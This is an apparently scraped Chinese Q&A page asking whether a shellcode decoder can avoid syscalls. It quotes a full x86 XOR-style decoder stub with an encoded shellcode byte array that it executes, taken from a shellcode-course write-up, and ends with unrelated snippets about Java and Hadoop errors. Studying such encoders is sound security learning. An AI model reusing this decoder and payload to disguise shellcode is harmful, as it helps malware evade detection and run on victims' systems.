如何设计一个没有 syscall/sysenter/int 0x80 的 shellcode 解码器?

如何解决如何设计一个没有 syscall/sysenter/int 0x80 的 shellcode 解码器?

我一直在研究 shellcode 解码器,并在网上找到了很多关于它的文章,例如, https://www.rcesecurity.com/2015/01/slae-custom-rbix-shellcode-encoder-decoder/

我发现的所有参考文献都使用了相同的设计理念,我认为这根本行不通。我将以上面的链接为例:

global _start           

section .text
_start:
    jmp get_shellcode

decoder:
    pop esi         ;pointer to shellcode
    push esi        ;save address of shellcode for later execution
    mov edi,esi    ;copy address of shellcode to edi to work with it

    xor eax,eax    ;clear first XOR-operand register
    xor ebx,ebx    ;clear second XOR-operand register
    xor ecx,ecx    ;clear inner loop-counter
    xor edx,edx    ;clear outer loop-counter

loop0:  
    mov al,[esi]   ;get first byte from the encoded shellcode
    mov bl,[esi+1] ;get second byte from the encoded shellcode
    xor al,bl      ;xor them (result is saved to eax)
    mov [edi],al   ;save (decode) to the same memory location as the encoded shellcode
    inc edi         ;move decoded-pointer 1 byte onward
    inc esi         ;move encoded-pointer 1 byte onward
    inc ecx         ;increment inner loop-counter
    cmp cl,0x3     ;dealing with 4byte-blocks!
    jne loop0          

    inc esi         ;move encoded-pointer 1 byte onward
    xor ecx,ecx    ;clear inner loop-counter
    add dx,0x4     ;move outer loop-counter 4 bytes onward
    cmp dx,len     ;check whether the end of the shellcode is reached
    jne loop0

    call [esp]      ;execute decoded shellcode

get_shellcode:
    call decoder
    shellcode: db 0x60,0x0a,0x6c,0x34,0xa6,0xcc,0xcd,0x96,0xf9,0xc8,0x3e,0x68,0xf5,0x9f,0x9d,0x37,0xbe,0x5f,0x92,0x5d,0xdd,0x82,0x15,0xe4,0x77,0xc7,0xa1,0xdc,0x8a,0xec,0x84,0xe2,0xe7,0xde,0xb8,0x17,0x44,0x2c,0x1d,0x67,0x36,0x18,0x4f,0xc6,0x27,0x55,0x98,0xa8,0x52,0x87,0x83,0x54,0xa5,0x89,0x09,0x16,0x70,0x33,0xe6,0xb0,0xb1,0xbf,0xd7,0x1a,0x5b,0xdb,0xea,0x59,0xca,0x23,0x93,0xac,0x61,0x0d,0x8d,0xc4,0xbd,0xed,0x14,0xa4,0xaf,0xe0,0x88,0xa7,0x25,0x56,0x63,0x4c,0x2e,0x47,0x5c,0x32,0xbb,0x58,0xc3,0x0b,0xc1,0xff,0xb2,0x22
    len:    equ $-shellcode

让我们暂时忽略实际的解码算法。这个想法是使用 db 关键字将 shellcode 放在内存中。这将在内存中的 .text 部分组装和加载。在运行时,解码器读取此内存并操作字节,然后然后写回内存。然后通过 call [esp] 执行解码后的输出。

如何写回内存的 .text 部分?我们必须调用 mprotect syscall 来启用对 text 部分的写权限或如果 shellcode 在堆栈或 .data 部分等中的执行权限。回到我最初的问题:

是否可以设计一个没有 syscall/sysenter/int 0x80 的 shellcode 解码器?

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐


使用本地python环境可以成功执行 import pandas as pd import matplotlib.pyplot as plt # 设置字体 plt.rcParams['font.sans-serif'] = ['SimHei'] # 能正确显示负号 p
错误1:Request method ‘DELETE‘ not supported 错误还原:controller层有一个接口,访问该接口时报错:Request method ‘DELETE‘ not supported 错误原因:没有接收到前端传入的参数,修改为如下 参考 错误2:cannot r
错误1:启动docker镜像时报错:Error response from daemon: driver failed programming external connectivity on endpoint quirky_allen 解决方法:重启docker -> systemctl r
错误1:private field ‘xxx‘ is never assigned 按Altʾnter快捷键,选择第2项 参考:https://blog.csdn.net/shi_hong_fei_hei/article/details/88814070 错误2:启动时报错,不能找到主启动类 #
报错如下,通过源不能下载,最后警告pip需升级版本 Requirement already satisfied: pip in c:\users\ychen\appdata\local\programs\python\python310\lib\site-packages (22.0.4) Coll
错误1:maven打包报错 错误还原:使用maven打包项目时报错如下 [ERROR] Failed to execute goal org.apache.maven.plugins:maven-resources-plugin:3.2.0:resources (default-resources)
错误1:服务调用时报错 服务消费者模块assess通过openFeign调用服务提供者模块hires 如下为服务提供者模块hires的控制层接口 @RestController @RequestMapping("/hires") public class FeignControl
错误1:运行项目后报如下错误 解决方案 报错2:Failed to execute goal org.apache.maven.plugins:maven-compiler-plugin:3.8.1:compile (default-compile) on project sb 解决方案:在pom.
参考 错误原因 过滤器或拦截器在生效时,redisTemplate还没有注入 解决方案:在注入容器时就生效 @Component //项目运行时就注入Spring容器 public class RedisBean { @Resource private RedisTemplate<String
使用vite构建项目报错 C:\Users\ychen\work>npm init @vitejs/app @vitejs/create-app is deprecated, use npm init vite instead C:\Users\ychen\AppData\Local\npm-
参考1 参考2 解决方案 # 点击安装源 协议选择 http:// 路径填写 mirrors.aliyun.com/centos/8.3.2011/BaseOS/x86_64/os URL类型 软件库URL 其他路径 # 版本 7 mirrors.aliyun.com/centos/7/os/x86
报错1 [root@slave1 data_mocker]# kafka-console-consumer.sh --bootstrap-server slave1:9092 --topic topic_db [2023-12-19 18:31:12,770] WARN [Consumer clie
错误1 # 重写数据 hive (edu)> insert overwrite table dwd_trade_cart_add_inc > select data.id, > data.user_id, > data.course_id, > date_format(
错误1 hive (edu)> insert into huanhuan values(1,'haoge'); Query ID = root_20240110071417_fe1517ad-3607-41f4-bdcf-d00b98ac443e Total jobs = 1
报错1:执行到如下就不执行了,没有显示Successfully registered new MBean. [root@slave1 bin]# /usr/local/software/flume-1.9.0/bin/flume-ng agent -n a1 -c /usr/local/softwa
虚拟及没有启动任何服务器查看jps会显示jps,如果没有显示任何东西 [root@slave2 ~]# jps 9647 Jps 解决方案 # 进入/tmp查看 [root@slave1 dfs]# cd /tmp [root@slave1 tmp]# ll 总用量 48 drwxr-xr-x. 2
报错1 hive> show databases; OK Failed with exception java.io.IOException:java.lang.RuntimeException: Error in configuring object Time taken: 0.474 se
报错1 [root@localhost ~]# vim -bash: vim: 未找到命令 安装vim yum -y install vim* # 查看是否安装成功 [root@hadoop01 hadoop]# rpm -qa |grep vim vim-X11-7.4.629-8.el7_9.x
修改hadoop配置 vi /usr/local/software/hadoop-2.9.2/etc/hadoop/yarn-site.xml # 添加如下 <configuration> <property> <name>yarn.nodemanager.res